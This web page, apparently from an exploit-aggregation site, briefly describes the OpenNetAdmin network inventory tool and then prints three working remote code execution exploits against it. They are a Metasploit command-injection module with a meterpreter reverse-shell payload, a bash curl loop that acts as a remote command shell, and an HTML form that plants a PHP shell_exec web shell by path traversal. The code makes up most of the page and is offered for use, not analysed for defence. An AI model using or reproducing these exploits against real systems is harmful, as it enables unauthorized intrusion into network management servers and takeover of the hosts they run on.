Nmmapper.com

Menu

Last update on .

Opennetadmin interface
Opennetadmin interface

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work. We hope to provide a useful Network Management application for managing your IP subnets, hosts and much more. Stop using spreadsheets to manage your network! Start doing proper IP address management!

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work. We hope to provide a useful Network Management application for managing your IP subnets, hosts and much more. Stop using spreadsheets to manage your network! Start doing proper IP address management!.

 

Features of OpenNetAdmin

  • Full CLI interface for batch and scripting
  • Plugin system to extend functionality
  • Audit managed subnets and discover new IPs
  • Manage DNS and DHCP server configs, archive host configs
  • And much more...

 

OpenNetAdmin Exploits Including Remote Code Execution

Recently there was a surge in opennetadmin exploit on google search, so I decided to compile some of the exploits for open net admin. When you perform a search on Nmmapper.com for OpenNetAdmin it yields three exploits for opennetadmin. Some of those include the following exploits

  • OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)
  • OpenNetAdmin 18.1.1 - Remote Code Execution
  • OpenNetAdmin 13.03.01 - Remote Code Execution

OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'OpenNetAdmin Ping Command Injection',
      'Description'     => %q{
        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
      },
      'Author'          =>
        [
          'mattpascoe', # Vulnerability discovery
          'Onur ER <onur@onurer.net>' # Metasploit module
        ],
      'References'      =>
        [
          ['EDB', '47691']
        ],
      'DisclosureDate'  => '2019-11-19',
      'License'         => MSF_LICENSE,
      'Platform'        => 'linux',
      'Arch'            => [ARCH_X86, ARCH_X64],
      'Privileged'      => false,
      'Targets'         =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultOptions'  =>
        {
          'RPORT'   => 80,
          'payload' => 'linux/x86/meterpreter/reverse_tcp'
        },
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('VHOST', [false, 'HTTP server virtual host']),
        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri.path),
      'ctype'         => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'vars_post'     => {
        'xajax'       => 'window_open',
        'xajaxargs[]' => 'app_about'
      }
     })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /OpenNetAdmin/i
      return CheckCode::Safe
    end

    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
    version = Gem::Version.new('opennetadmin_version')

    if version
      vprint_status "OpenNetAdmin version #{version}"
    end

    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
      return CheckCode::Appears
    end

    CheckCode::Detected
  end

  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :printf)
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
  end

  def execute_command(cmd, opts = {})
    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"

    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path),
        'ctype'         => 'application/x-www-form-urlencoded',
        'encode_params' => false,
        'data'          => post_data
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

 

OpenNetAdmin 18.1.1 - Remote Code Execution

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

 

OpenNetAdmin 13.03.01 - Remote Code Execution

<center>
<head>
<title>0wned Your Network</title>
<script type="text/javascript">
function changeaction()
{
    document.sploit.action = document.getElementById("url").value;
    alert('Remember, your shell must be accessed via
'+document.getElementById("url").value+'?module=mandat0ry');
}
</script>
</head>
<font size="5">OpenNetAdmin RCE Exploit</font><br />
<font size="2"><i>Now with leet button sploiting action! (oooh,
ahhh!)</i></font><br /><br />
<form action="/" method="post" name="sploit" onsubmit="changeaction()" >
URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
PHP Code to Execute: <input type="text" size="50" name="options[desc]"
value="<?php echo shell_exec($_GET[1]) ?>"/> <br />
<input type="hidden" name="module" value="add_module" />
<input type="hidden" name="options[name]" value="mandat0ry" />
<input type="hidden" name="options[file]"
value="../../../../../../../../../../../var/log/ona.log" />
<input type="submit" value="Exploit!" />
</form>
<b><i>Special thanks to: offsec, twitches, funkenstein, zachzor,
av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b>
</center>

 

From our friends

Similar entries

Comments

  1. Wangolo JoelWangolo Joel on #

    When you try to search for this exploit you get much results of them. And it seems it's among the top searched exploits.

Comments are closed.